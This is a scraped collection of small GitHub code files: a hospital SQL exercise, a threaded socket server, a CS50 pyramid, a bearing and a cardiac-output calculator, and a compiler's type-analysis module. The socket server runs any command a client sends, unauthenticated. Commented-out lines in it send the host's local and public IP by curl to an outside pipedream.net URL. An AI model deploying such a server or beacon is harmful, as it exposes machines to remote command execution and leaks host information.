AND Salary >= ?\"\"\"\ncursor.execute(query, (spcl, sal))\nrecord = cursor.fetchall()\nfor row in record:\n print(\"Doctor Id: \", row[0])\n print(\"Doctor Name: \", row[1])\n print(\"Hospital Id: \", row[2])\n print(\"Joining Date: \", row[3])\n print(\"Specialty: \", row[4])\n print(\"Salary: \", row[5])\n print(\"Experience: \", row[6], \"\\n\")\nprint(\"\\n\")\nHospital_id = input(\"Select ID for info:\")\nselect_query = \"\"\"SELECT * from Hospital WHERE Hospital_Id = ?\"\"\"\ncursor.execute(select_query, (Hospital_id,))\nrecords = cursor.fetchone()\nhospitaldetails = records[1]\nsql_ = \"\"\"SELECT * from Doctor WHERE Hospital_Id = ?\"\"\"\ncursor.execute(sql_,(Hospital_id) )\nrecord = cursor.fetchall()\nfor row in record:\n print(\"Doctor Name:\", row[1])\n print(\"Hospital Id:\", row[2])\n print(\"Hospital name\",hospitaldetails, \"\\n\")\n\n\nconn.commit()\nconn.close()","repo_name":"anagha-joji/Week4","sub_path":"Assignment2.py","file_name":"Assignment2.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10071830221","text":"\n# function for handling command\ndef handleCommand(string):\n res = subprocess.check_output(string.split())\n return res\n\n#Function for handling connections. This will be used to create threads\ndef clientthread(conn):\n #Sending message to connected client\n conn.send(b'Welcome to the server. Type something and hit enter\\n') #send only takes string\n\n stringbuilder = \"\"\n stringBuilt = False\n\n #infinite loop so that function do not terminate and thread do not end.\n while True:\n\n #Receiving from client\n data = conn.recv(1024)\n # reply = 'OK, sending: ' + str(data, 'utf-8')\n datastr = str(data, 'utf-8')\n if datastr[-1:] is not \"\\n\":\n if stringBuilt is True:\n stringbuilder = \"\"\n stringBuilt = False\n stringbuilder += datastr\n if datastr[-1:] is \"\\n\":\n stringBuilt = True\n\n if stringBuilt is True:\n res = handleCommand(stringbuilder)\n print(str(res, 'utf-8'))\n conn.sendall(bytes('OK, sending: ' + stringbuilder, 'utf-8'))\n conn.sendall(bytes('Returned: ' + str(res, 'utf-8'), 'utf-8'))\n\n if not data:\n break\n\n # conn.sendall(bytes(reply, 'utf-8'))\n\n # print(str(data, 'utf-8').split(' '))\n # print(str(data, 'utf-8'))\n #\n # res = subprocess.check_output(str(data, 'utf-8').split())\n # conn.sendall(bytes(res, 'utf-8'));\n\n #came out of loop\n conn.close()\n\nimport subprocess\n# ip = str(handleCommand(\"ipconfig getifaddr en0\"), 'utf-8')\n# print(ip)\n# pubip = str(handleCommand(\"curl ifconfig.co\"), 'utf-8')\n# print(pubip)\n# handleCommand(\"curl https://enir9zpsoeuo.x.pipedream.net//?localip=\"+ip[0:-1]+\"&publicip=\"+pubip[0:-1])\n\n'''\n\tSimple socket server using threads\n'''\n\nimport socket\nimport sys\nfrom threading import *\n\nHOST = ''\t# Symbolic name meaning all available interfaces\nPORT = 6969\t# Arbitrary non-privileged port\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint('Socket created')\n\n#Bind socket to local host and port\ntry:\n s.bind((HOST, PORT))\nexcept socket.error as msg:\n print('Bind failed. 
Error Code : ' + str(msg.errno) + ' Message ' + str(msg.strerror))\n    sys.exit()\n\nprint('Socket bind complete')\n\n#Start listening on socket\ns.listen(10)\nprint('Socket now listening')\n\n\n#now keep talking with the client\nwhile 1:\n    #wait to accept a connection - blocking call\n    conn, addr = s.accept()\n    print('Connected with ' + addr[0] + ':' + str(addr[1]))\n\n    #start new thread takes 1st argument as a function name to be run, second is the tuple of arguments to the function.\n    thread = Thread(target=clientthread ,args=(conn,))\n    thread.start()\n    thread.join()\ns.close()","repo_name":"Snakehater/PythonSocketConnection","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"16218286538","text":"import cs50\n\n\n# checking input\nwhile True:\n    h = cs50.get_int(\"Height: \")\n    if h > 0 and h < 9:\n        break\n\n# drawing the pyramid\nfor i in range(h):\n    print(\" \" * (h - i - 1), end=\"\")\n    print(\"#\" * (i + 1), end=\"\\n\")","repo_name":"Alexey3250/CS50_projects","sub_path":"sentimental-mario-less/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"19957607023","text":"# -*- coding: utf-8 -*-\n# Author: xcl\n# Date: 2019/7/15 13:02\n\n\nimport math\nimport pandas as pd\nimport numpy as np\nfrom math import radians, sin, cos, degrees, atan2\n\n\ndef getDegree(latA, lonA, latB, lonB):\n    \"\"\"\n    Args:\n        point p1(latA, lonA)\n        point p2(latB, lonB)\n    Returns:\n        bearing between the two GPS points,\n        default: the basis of heading direction is north\n    \"\"\"\n    radLatA = radians(latA)\n    radLonA = radians(lonA)\n    radLatB = radians(latB)\n    radLonB = radians(lonB)\n    dLon = radLonB - radLonA\n    y = sin(dLon) * cos(radLatB)\n    x = cos(radLatA) * sin(radLatB) - sin(radLatA) * cos(radLatB) * cos(dLon)\n    brng = degrees(atan2(y, x))\n    brng = (brng + 360) % 360\n    return brng\n\n\nc = getDegree(0, 0, -4,-4)\n\nprint(c)\n\n# The 'def azimuthAngle( x1, y1, x2, y2)' snippets circulating online are wrong; do not use them.","repo_name":"MddeLip/MODIS_AOD_PM25","sub_path":"扩展库和扩展程序/程序/方位角角度.py","file_name":"方位角角度.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
{"seq_id":"33928458438","text":"import matplotlib.pyplot as plt\r\nimport math as m\r\nimport csv\r\nimport os\r\nimport inspect\r\n\r\n\r\nfile2=open('C:\\\\Users\\\\Louis\\\\Desktop\\\\t2.txt', 'r')\r\nreader = csv.reader(file2,delimiter='\\t',skipinitialspace=True)\r\n\r\nTemps=[]\r\nValeur=[]\r\n\r\nfor row in reader:\r\n    Temps.append(float(row[0])) # reads the Time value from valeurs.txt\r\n    Valeur.append(float(row[1])) # reads the Temps value from valeurs.txt\r\n\r\n#print(Temps)\r\n#print(Valeur)\r\n\r\nTinit = Valeur[0]\r\nValeurinv = []\r\n\r\nfor i in range(len(Valeur)):\r\n    Valeurinv.append(-(Valeur[i]-Tinit))\r\n\r\nValeurinvfiltre = []\r\nTempsfiltre = []\r\nJ = []\r\n\r\nfor j in range(len(Valeurinv)):\r\n    if Valeurinv[j]>max(Valeurinv)*0.05:\r\n        Valeurinvfiltre.append(Valeurinv[j])\r\n        Tempsfiltre.append(Temps[j])\r\n        J.append(j)\r\n\r\nValeurinvfiltre.insert(0,Valeurinv[J[0]-1])\r\nTempsfiltre.insert(0,Temps[J[0]-1])\r\n\r\nA = []\r\nmoy = 0\r\n\r\nfor u in range(len(Tempsfiltre)-1):\r\n    A.append((Valeurinvfiltre[u]+Valeurinvfiltre[u+1])/2*(Tempsfiltre[u+1]-Tempsfiltre[u]))\r\n\r\nair = 0\r\nfor p in range(len(A)):\r\n    
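`getDegree` computes the initial great-circle bearing measured clockwise from north. A self-contained check that a step toward (-4, -4) from the origin comes out just under 225 degrees, i.e. roughly south-west:

from math import radians, sin, cos, degrees, atan2

def bearing(latA, lonA, latB, lonB):
    # Same forward-azimuth formula as getDegree above.
    dLon = radians(lonB) - radians(lonA)
    y = sin(dLon) * cos(radians(latB))
    x = cos(radians(latA)) * sin(radians(latB)) \
        - sin(radians(latA)) * cos(radians(latB)) * cos(dLon)
    return (degrees(atan2(y, x)) + 360) % 360

print(round(bearing(0, 0, -4, -4), 2))  # ~224.93, matching the print above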
air = air + A[p]\r\n\r\n#print(air)\r\n\r\n#DC = ((Ts-Ti)*Vi*K)/air\r\nDC = ((26.56-6.68)*0.02*(2.28*10**-3))/air\r\n#DC = ((27.25-7.86)*0.02*(2.28*10**-3))/air\r\n\r\n#print (air)\r\n\r\nincert = m.sqrt(abs(0.02*0.00238/air)**2*(0.5**2))\r\n\r\nprint(\"Débit cardiaque :\", round(DC,7), \"+/-\", round(incert, 6), \"m3/sec\")\r\nprint(\"Débit cardiaque :\", round(DC*60000,3), \"+/-\", round(incert*60000, 3), \"L/min\")\r\n\r\n\r\n#plt.plot(Temps, Valeur)\r\nplt.plot(Temps, Valeurinv)\r\n#plt.plot(Tempsfiltre, Valeurinvfiltre)\r\nplt.show()\r\n","repo_name":"louis-bvr/louis-bvr.github.io","sub_path":"data/TIPE/programmes/Python/thermoDC.py","file_name":"thermoDC.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25977891682","text":"\"\"\"Type checking and inference.\n\nType analysis works via abstract interpretation. Each syntactic\nconstruct has a transfer function that monotonically maps from the\ntypes of its inputs to the types of its outputs. Each construct also\nhas upper-bound constraints on the allowed types for its inputs.\nThe meaning of the transfer function is that, if the input values are\nof the appropriate input types, then the output values are of the\nappropriate output types. Likewise, the meaning of the upper-bound\nconstraints is that if the input values are subtypes of the upper\nbounds, then execution of the construct does not cause a type error.\n\nThe abstract interpretation initializes all symbols' types to Bottom,\nmeaning that (so far) they have no possible values and are safe to use\nin all syntactic constructs. It then iteratively (and monotonically)\nincreases the symbols' types by lattice-joining them with the output\ntype of any construct that writes to them. Once fixed point is achieved,\nwe know that no symbol will ever receive a value at runtime that is not\nof the inferred type.\n\nEnsuring termination requires widening, which is not currently done.\n\nThe program is well-typed if each upper bound constraint is satisfied\nby the inferred types of its inputs. 
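The loop above accumulates trapezoid slices by hand and then applies the Stewart-Hamilton relation DC = (Ts - Ti) * Vi * K / area. The same integral as a small reusable helper; the sample numbers here are invented:

def trapezoid(xs, ys):
    # Sum of (mean of adjacent heights) * (step width), as in the loop above.
    return sum((ys[i] + ys[i + 1]) / 2 * (xs[i + 1] - xs[i])
               for i in range(len(xs) - 1))

xs = [0.0, 1.0, 2.0, 3.0]
ys = [0.0, 0.8, 0.5, 0.0]
area = trapezoid(xs, ys)
print(area)  # 1.3
# Stewart-Hamilton estimate with the script's constants:
print((26.56 - 6.68) * 0.02 * 2.28e-3 / area)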
We do not necessarily require\nprograms to be well-typed.\n\"\"\"\n\n\n__all__ = [\n 'FunctionTypeChecker',\n 'TypeAnalysisStepper',\n 'analyze_types',\n 'analyze_expr_type',\n]\n\n\nfrom functools import wraps\n\nfrom incoq.util.collections import OrderedSet\nfrom incoq.compiler.incast import L\n\nfrom .types import *\n\n\nclass FunctionTypeChecker:\n \n \"\"\"Determine if a function call is well-typed.\"\"\"\n \n def get_sequence_elt(self, t_seq, seq_cls):\n \"\"\"As in the TypeAnalysisStepper method, but instead of marking\n bad nodes, return None.\n \"\"\"\n t_seq = t_seq.join(seq_cls(Bottom))\n if not t_seq.issmaller(seq_cls(Top)):\n return None\n return t_seq.elt\n \n # Mapping from name of builtin function to a pair of its expected\n # argument types and its return type.\n #\n # For polymorphic functions, define a custom handler.\n simple_builtin_funcs = {\n 'Set': ([], Set(Bottom)),\n }\n \n def typeof_print(self, node, t_args):\n return Top\n \n def typeof_list(self, node, t_args):\n if len(t_args) != 1:\n return None\n \n t_elt = self.get_sequence_elt(t_args[0], Sequence)\n if t_elt is None:\n return None\n return List(t_elt)\n \n def typeof_sorted(self, node, t_args):\n if len(t_args) != 1:\n return None\n \n t_elt = self.get_sequence_elt(t_args[0], Sequence)\n if t_elt is None:\n return None\n return List(t_elt)\n \n def get_call_type(self, node, t_args):\n \"\"\"Given a Call node and a list of types for each of its\n arguments, return the type of the Call's result. If the\n Call is ill-typed/unknown, return None.\n \"\"\"\n assert len(t_args) == len(node.args)\n \n # See if it matches one of the simple built-in cases.\n if node.func in self.simple_builtin_funcs:\n t_params, t_result = self.simple_builtin_funcs[node.func]\n assert len(t_params) == len(t_args)\n # Check that each actual argument is a subtype of the\n # parameter types.\n for t_param, t_arg in zip(t_params, t_args):\n if not t_arg.issmaller(t_param):\n return None\n return t_result\n \n # Otherwise, if it's a built-in that we have a handler for,\n # dispatch to it.\n handler_name = 'typeof_' + node.func\n handler = getattr(self, handler_name, None)\n if handler is not None:\n return handler(node, t_args)\n \n # Otherwise, it's unknown.\n return None\n\n\nclass TypeAnalysisStepper(L.AdvNodeVisitor):\n \n \"\"\"Run one iteration of transfer functions for all the program's\n nodes. Return the store (variable -> type mapping) and a boolean\n indicating whether the store has been changed (i.e. whether new\n information was inferred).\n \"\"\"\n \n def __init__(self, store, height_limit=None, unknown=Top,\n fixed_vars=None):\n super().__init__()\n self.store = store\n \"\"\"Mapping from symbol names to inferred types.\n Each type may only change in a monotonically increasing way.\n \"\"\"\n self.height_limit = height_limit\n \"\"\"Maximum height of type terms in the store. None for no limit.\"\"\"\n self.illtyped = OrderedSet()\n \"\"\"Nodes where the well-typedness constraints are violated.\"\"\"\n self.changed = True\n \"\"\"True if the last call to process() updated the store\n (or if there was no call so far).\n \"\"\"\n self.unknown = unknown\n \"\"\"Type to use for variables not in the store. Should be Bottom,\n Top, or None. 
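The docstring above describes the scheme abstractly; a toy version makes the fixed-point loop concrete: every symbol starts at Bottom, each write joins in a type, and iteration stops once the store is stable. The four-point lattice (Bottom < Number, Bool < Top) is illustrative only:

def join(a, b):
    # Least upper bound on the toy lattice.
    if a == b: return a
    if a == "Bottom": return b
    if b == "Bottom": return a
    return "Top"  # e.g. Number join Bool

assigns = [("x", "Number"), ("y", "Bool"), ("x", "Bool"), ("z", "Number")]
store = {}
changed = True
while changed:  # monotone joins on a finite lattice, so this terminates
    changed = False
    for var, t in assigns:
        new = join(store.get(var, "Bottom"), t)
        if new != store.get(var, "Bottom"):
            store[var], changed = new, True
print(store)  # {'x': 'Top', 'y': 'Bool', 'z': 'Number'}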
None indicates that an error should be raised for\n unknown variables.\n \"\"\"\n if fixed_vars is None:\n fixed_vars = []\n self.fixed_vars = fixed_vars\n \"\"\"Names of variables whose types cannot be changed by inference.\"\"\"\n \n def process(self, tree):\n self.changed = False\n super().process(tree)\n return self.store\n \n def get_store(self, name):\n try:\n return self.store[name]\n except KeyError:\n if self.unknown is None:\n raise\n else:\n return self.unknown\n \n def update_store(self, name, type):\n if name in self.fixed_vars:\n return self.store[name]\n \n old_type = self.get_store(name)\n new_type = old_type.join(type)\n if self.height_limit is not None:\n new_type = new_type.widen(self.height_limit)\n if new_type != old_type:\n self.changed = True\n self.store[name] = new_type\n return new_type\n \n def mark_bad(self, node):\n self.illtyped.add(node)\n \n def readonly(f):\n \"\"\"Decorator for handlers for expression nodes that only\n make sense in read context.\n \"\"\"\n @wraps(f)\n def wrapper(self, node, *, type=None):\n if type is not None:\n self.mark_bad(node)\n return f(self, node, type=type)\n return wrapper\n \n @readonly\n def default_expr_handler(self, node, *, type=None):\n \"\"\"Expression handler that just recurses and returns Top.\"\"\"\n self.generic_visit(node)\n return Top\n \n # Each visitor handler has a monotonic transfer function and\n # possibly a constraint for well-typedness.\n #\n # The behavior of each handler is described in a comment using\n # the following informal syntax.\n #\n # X := Y Assign the join of X and Y to X\n # Check X <= Y Well-typedness constraint that X is a\n # subtype of Y\n # Return X Return X as the type of an expression\n # Fail Mark an error at this node and return Top\n #\n # This syntax is augmented by If/Elif/Else and pattern matching,\n # e.g. iter == Set introduces T as the element type of iter.\n # join(T1, T2) is the lattice join of T1 and T2.\n #\n # Expression visitors have a keyword argument 'type', and can be\n # used in read or write context. In read context, type is None.\n # In write context, type is the type passed in from context. In\n # both cases the type of the expression is returned. Handlers\n # that do not tolerate write context are decorated as @readonly;\n # they still run but record a well-typedness error.\n \n def get_sequence_elt(self, node, t_seq, seq_cls):\n \"\"\"Given a sequence type, and a sequence type constructor\n (e.g. Sequence, List, or Set), return the element type of\n the sequence type. If the sequence type cannot safely be\n converted to the given type constructor's form (for instance\n if it is not actually a sequence), return Top and mark node\n as ill-typed.\n \"\"\"\n # Join to ensure that we're looking at a type object that\n # is an instance of seq_cls, as opposed to some other type\n # object in the lattice.\n t_seq = t_seq.join(seq_cls(Bottom))\n if not t_seq.issmaller(seq_cls(Top)):\n self.mark_bad(node)\n return Top\n return t_seq.elt\n \n def get_map_keyval(self, node, t_map):\n \"\"\"Given a map type, return its key and value type. If the\n given type cannot safely be converted to a map type, return\n a pair of Tops instead and mark the node as ill-typed.\n \"\"\"\n t_map = t_map.join(Map(Bottom, Bottom))\n if not t_map.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n return Top, Top\n return t_map.key, t_map.value\n \n def get_tuple_elts(self, node, t_tup, arity):\n \"\"\"Given a tuple type, return the element types. 
If the given\n        type cannot safely be converted to a tuple of the given arity,\n        return arity many Tops, and mark node as ill-typed.\n        \"\"\"\n
        t_tup = t_tup.join(Tuple([Bottom] * arity))\n        if not t_tup.issmaller(Tuple([Top] * arity)):\n            self.mark_bad(node)\n            return [Top] * arity\n        return t_tup.elts\n    \n
    # Use default handler for Return.\n    \n
    def visit_For(self, node):\n        # If join(iter, Sequence<Bottom>) == Sequence<T>:\n        #     target := T\n        # Else:\n        #     target := Top\n        #\n        # Check iter <= Sequence<Top>\n
        t_iter = self.visit(node.iter)\n        t_target = self.get_sequence_elt(node, t_iter, Sequence)\n        self.update_store(node.target, type=t_target)\n        self.visit(node.body)\n    \n
    def visit_DecompFor(self, node):\n        # If join(iter, Sequence<Tuple<Bottom, ..., Bottom>>) ==\n        #       Sequence<Tuple<T1, ..., Tn>>, n == len(vars):\n        #     vars_i := T_i for each i\n        # Else:\n        #     vars_i := Top for each i\n        #\n        # Check iter <= Sequence<Tuple<Top, ..., Top>>\n
        n = len(node.vars)\n        t_iter = self.visit(node.iter)\n        t_target = self.get_sequence_elt(node, t_iter, Sequence)\n        t_vars = self.get_tuple_elts(node, t_target, n)\n        for v, t in zip(node.vars, t_vars):\n            self.update_store(v, t)\n        self.visit(node.body)\n    \n
    def visit_While(self, node):\n        # Check test <= Bool\n        t_test = self.visit(node.test)\n        if not t_test.issmaller(Bool):\n            self.mark_bad(node)\n        self.visit(node.body)\n    \n
    def visit_If(self, node):\n        # Check test <= Bool\n        t_test = self.visit(node.test)\n        if not t_test.issmaller(Bool):\n            self.mark_bad(node)\n        self.visit(node.body)\n        self.visit(node.orelse)\n    \n
    # Use default handler for Pass, Break, Continue, and Expr.\n    \n
    def visit_Assign(self, node):\n        # target := value\n        t_value = self.visit(node.value)\n        self.update_store(node.target, t_value)\n    \n
    def visit_DecompAssign(self, node):\n        # If join(value, Tuple<Bottom, ..., Bottom>) ==\n        #       Tuple<T1, ..., Tn>, n == len(vars):\n        #     vars_i := T_i for each i\n        # Else:\n        #     vars_i := Top for each i\n        #\n        # Check value <= Tuple<Top, ..., Top>\n
        n = len(node.vars)\n        t_value = self.visit(node.value)\n        t_vars = self.get_tuple_elts(node, t_value, n)\n        for v, t in zip(node.vars, t_vars):\n            self.update_store(v, t)\n    \n
    def visit_SetUpdate(self, node):\n        # target := Set<value>\n        # Check target <= Set<Top>\n        t_value = self.visit(node.value)\n        t_target = self.visit(node.target, type=Set(t_value))\n        if not t_target.issmaller(Set(Top)):\n            self.mark_bad(node)\n    \n
    def visit_SetBulkUpdate(self, node):\n        # If join(value, Set<Bottom>) == Set<T>:\n        #     target := Set<T>\n        # Else:\n        #     target := Set<Top>\n        #\n        # Check value <= Set<Top> and target <= Set<Top>\n
        t_value = self.visit(node.value)\n        t_elt = self.get_sequence_elt(node, t_value, Set)\n        t_target = self.visit(node.target, type=Set(t_elt))\n        if not (t_value.issmaller(Set(Top)) and\n                t_target.issmaller(Set(Top))):\n            self.mark_bad(node)\n    \n
    def visit_SetClear(self, node):\n        # target := Set<Bottom>\n        # Check target <= Set<Top>\n        t_target = self.visit(node.target, type=Set(Bottom))\n        if not t_target.issmaller(Set(Top)):\n            self.mark_bad(node)\n    \n
    def visit_RelUpdate(self, node):\n        # rel := Set<elem>\n        # Check rel <= Set<Top>\n        t_value = self.get_store(node.elem)\n        t_rel = self.update_store(node.rel, Set(t_value))\n        if not t_rel.issmaller(Set(Top)):\n            self.mark_bad(node)\n    \n
    def visit_RelClear(self, node):\n        # rel := Set<Bottom>\n        # Check rel <= Set<Top>\n        t_rel = self.update_store(node.rel, Set(Bottom))\n        if not t_rel.issmaller(Set(Top)):\n            self.mark_bad(node)\n    \n
    def visit_DictAssign(self, node):\n        # target := Map<key, value>\n        # Check target <= Map<Top, Top>\n        t_key = self.visit(node.key)\n        t_value = self.visit(node.value)\n        t_target = self.visit(node.target, type=Map(t_key, t_value))\n        if not t_target.issmaller(Map(Top, Top)):\n            self.mark_bad(node)\n    \n
    def visit_DictDelete(self, node):\n        # target := Map<key, Bottom>\n        # Check target <= Map<Top, Top>\n        t_key = self.visit(node.key)\n        t_target = self.visit(node.target, type=Map(t_key, Bottom))\n        if not t_target.issmaller(Map(Top, Top)):\n            self.mark_bad(node)\n    \n
    def visit_DictClear(self, node):\n        # target := Map<Bottom, Bottom>\n        # Check target <= Map<Top, Top>\n        t_target = self.visit(node.target, type=Map(Bottom, Bottom))\n        if not t_target.issmaller(Map(Top, Top)):\n            self.mark_bad(node)\n    \n
    def visit_MapAssign(self, node):\n        # map := Map<key, value>\n        # Check map <= Map<Top, Top>\n        t_key = self.get_store(node.key)\n        t_value = self.get_store(node.value)\n        t_map = self.update_store(node.map, Map(t_key, t_value))\n        if not t_map.issmaller(Map(Top, Top)):\n            self.mark_bad(node)\n    \n
    def visit_MapDelete(self, node):\n        # map := Map<key, Bottom>\n        # Check map <= Map<Top, Top>\n        t_key = self.get_store(node.key)\n        t_map = self.update_store(node.map, Map(t_key, Bottom))\n        if not t_map.issmaller(Map(Top, Top)):\n            self.mark_bad(node)\n    \n
    def visit_MapClear(self, node):\n        # target := Map<Bottom, Bottom>\n        # Check target <= Map<Top, Top>\n        t_map = self.update_store(node.map, Map(Bottom, Bottom))\n        if not t_map.issmaller(Map(Top, Top)):\n            self.mark_bad(node)\n    \n
    # Attribute handlers not implemented:\n    #   visit_AttrAssign\n    #   visit_AttrDelete\n    \n
    @readonly\n    def visit_UnaryOp(self, node, *, type=None):\n        # If op == Not:\n        #     Return Bool\n        #     Check operand <= Bool\n        # Else:\n        #     Return Number\n        #     Check operand <= Number\n
        t_operand = self.visit(node.operand)\n        if isinstance(node.op, L.Not):\n            t = Bool\n        else:\n            t = Number\n        if not t_operand.issmaller(t):\n            self.mark_bad(node)\n        return t\n    \n
    @readonly\n    def visit_BoolOp(self, node, *, type=None):\n        # Return Bool\n        # Check v <= Bool for v in values\n        t_values = [self.visit(v) for v in node.values]\n        if not all(t.issmaller(Bool) for t in t_values):\n            self.mark_bad(node)\n        return Bool\n    \n
    @readonly\n    def visit_BinOp(self, node, *, type=None):\n        # Return join(left, right)\n        t_left = self.visit(node.left)\n        t_right = self.visit(node.right)\n        return t_left.join(t_right)\n    \n
    @readonly\n    def visit_Compare(self, node, *, type=None):\n        # Return Bool.\n        self.visit(node.left)\n        self.visit(node.right)\n        return Bool\n    \n
    @readonly\n    def visit_IfExp(self, node, *, type=None):\n        # Return join(body, orelse)\n        # Check test <= Bool\n        t_test = self.visit(node.test)\n        t_body = self.visit(node.body)\n        t_orelse = self.visit(node.orelse)\n        if not t_test.issmaller(Bool):\n            self.mark_bad(node)\n        return t_body.join(t_orelse)\n    \n
    @readonly\n    def visit_GeneralCall(self, node, *, type=None):\n        # Return Top\n        self.generic_visit(node)\n        return Top\n    \n
    @readonly\n    def visit_Call(self, node, *, type=None):\n        checker = FunctionTypeChecker()\n        t_args = [self.visit(a) for a in node.args]\n        t_result = checker.get_call_type(node, t_args)\n        if t_result is None:\n            self.mark_bad(node)\n            return Top\n        return t_result\n    \n
    @readonly\n    def visit_Num(self, node, *, type=None):\n        # Return Number\n        return Number\n    \n
    @readonly\n    def visit_Str(self, node, *, type=None):\n        # Return String\n        return String\n    \n
    @readonly\n    def visit_NameConstant(self, node, *, type=None):\n        # For True/False:\n        #     Return Bool\n        # For None:\n        #     Return Top\n        if node.value in [True, False]:\n            return Bool\n        elif node.value is None:\n            return Top\n        else:\n            assert()\n    \n
    def visit_Name(self, node, *, type=None):\n        # Read or update the type in the store, depending on\n        # whether we're in read or write context.\n        name = node.id\n        if type is None:\n            return self.get_store(name)\n        else:\n            return self.update_store(name, type)\n    \n
    @readonly\n    def visit_List(self, node, *, type=None):\n        # Return List<join(T1, ..., Tn)>\n        t_elts = [self.visit(e) for e in node.elts]\n        t_elt = Bottom.join(*t_elts)\n        return List(t_elt)\n    \n
    @readonly\n    def visit_Set(self, node, *, type=None):\n        # Return Set<join(T1, ..., Tn)>\n        t_elts = [self.visit(e) for e in node.elts]\n        t_elt = Bottom.join(*t_elts)\n        return Set(t_elt)\n    \n
    @readonly\n    def visit_Tuple(self, node, *, type=None):\n        # Return Tuple<T1, ..., Tn>\n        t_elts = [self.visit(e) for e in node.elts]\n        return Tuple(t_elts)\n    \n
    # TODO: More precise behavior requires adding objects to the\n    # type algebra.\n    \n    visit_Attribute = default_expr_handler\n    \n
    @readonly\n    def visit_Subscript(self, node, *, type=None):\n        # If value == Bottom:\n        #     Return Bottom\n        # Elif value == Tuple<T0, ..., Tn>:\n        #     If index == Num(k) node, 0 <= k <= n:\n        #         Return Tk\n        #     Else:\n        #         Return join(T0, ..., Tn)\n        # Elif join(value, List<Bottom>) == List<T>:\n        #     Return T\n        # Else:\n        #     Return Top\n        #\n        # Check value <= List<Top> or value is a Tuple\n        # Check index <= Number\n
        t_value = self.visit(node.value)\n        t_index = self.visit(node.index)\n        if not t_index.issmaller(Number):\n            self.mark_bad(node)\n        \n
        # Try Tuple case first. Since we don't have a type for tuples\n        # of arbitrary arity, we'll use an isinstance() check. This\n        # may have to change if we add new subtypes of Tuple to the\n        # lattice.\n
        if isinstance(t_value, Tuple):\n            if (isinstance(node.index, L.Num) and\n                0 <= node.index.n < len(t_value.elts)):\n                return t_value.elts[node.index.n]\n            else:\n                return Bottom.join(*t_value.elts)\n        \n
        # Otherwise, treat it as a list or list subtype.\n        return self.get_sequence_elt(node, t_value, List)\n    \n
    def visit_DictLookup(self, node, *, type=None):\n        # If type != None:\n        #     value := Map<Bottom, type>\n        #\n        # If join(value, Map<Bottom, Bottom>) == Map<K, V>:\n        #     R = V\n        # Else:\n        #     R = Top\n        # Return join(R, default)\n        #\n        # Check value <= Map<Top, Top>\n
        t_value = Map(Bottom, type) if type is not None else None\n        t_value = self.visit(node.value, type=t_value)\n        t_default = (self.visit(node.default)\n                     if node.default is not None else None)\n        t_value = t_value.join(Map(Bottom, Bottom))\n        if not t_value.issmaller(Map(Top, Top)):\n            self.mark_bad(node)\n            return Top\n        return t_value.value.join(t_default)\n    \n
    visit_FirstThen = default_expr_handler\n    \n
    @readonly\n    def visit_ImgLookup(self, node, *, type=None):\n        # Check rel <= Set<Top>\n        # Return Set<Top>\n        t_rel = self.visit(node.set)\n        if not t_rel.issmaller(Set(Top)):\n            self.mark_bad(node)\n            return Top\n        return Set(Top)\n    \n
    @readonly\n    def visit_SetFromMap(self, node, *, type=None):\n        # Check map <= Map<Top, Top>\n        # Return Set<Top>\n        t_map = self.visit(node.map)\n        if not t_map.issmaller(Map(Top, Top)):\n            self.mark_bad(node)\n            return Top\n        return Set(Top)\n    \n
    visit_Unwrap = default_expr_handler\n    visit_Wrap = default_expr_handler\n    \n    visit_IsSet = default_expr_handler\n    visit_HasField = default_expr_handler\n    visit_IsMap = default_expr_handler\n    visit_HasArity = default_expr_handler\n    \n
    @readonly\n    def visit_Query(self, node, *, type=None):\n        # Return query\n        return self.visit(node.query)\n    \n
    @readonly\n    def visit_Comp(self, node, *, type=None):\n        # Return Set<resexp>\n        for cl in node.clauses:\n            self.visit(cl)\n        t_resexp = self.visit(node.resexp)\n        return Set(t_resexp)\n    \n
    @readonly\n    def visit_Member(self, node, *, type=None):\n        # If join(iter, Set<Bottom>) == Set<T>:\n        #     target := T\n        # Else:\n        #     target := Top\n        #\n        # Check iter <= Set<Top>\n
        t_iter = self.visit(node.iter)\n        t_target = self.get_sequence_elt(node, t_iter, Set)\n        self.visit(node.target, type=t_target)\n    \n
    @readonly\n    def visit_RelMember(self, node, *, type=None):\n        # If join(rel, Set<Tuple<Bottom, ..., Bottom>>) ==\n        #     Set<Tuple<T1, ..., Tn>>, n == len(vars):\n        #     vars_i := T_i for each i\n        # Else:\n        #     vars_i := Top for each i\n        #\n        # Check rel <= Set<Tuple<Top, ..., Top>>\n
        n = len(node.vars)\n        t_rel = self.get_store(node.rel)\n        t_target = self.get_sequence_elt(node, t_rel, Set)\n        t_vars = self.get_tuple_elts(node, t_target, n)\n        for v, t in zip(node.vars, t_vars):\n            self.update_store(v, t)\n    \n
    @readonly\n    def visit_SingMember(self, node, *, type=None):\n        # If join(value, Tuple<Bottom, ..., Bottom>) ==\n        #       Tuple<T1, ..., Tn>, n == len(vars):\n        #     vars_i := T_i for each i\n        # Else:\n        #     vars_i := Top for each i\n        #\n        # Check value <= Tuple<Top, ..., Top>\n
        n = len(node.vars)\n        t_value = self.visit(node.value)\n        t_vars = self.get_tuple_elts(node, t_value, n)\n        for v, t in zip(node.vars, t_vars):\n            self.update_store(v, t)\n    \n
    @readonly\n    def visit_WithoutMember(self, node, *, type=None):\n        # We don't have an easy way to propagate information into\n        # the nested clause, or else we'd flow type information from\n        # value to cl.target. Could fix by using the type parameter,\n        # with the convention that for membership clauses, type is the\n        # type of the element.\n        self.generic_visit(node)\n    \n
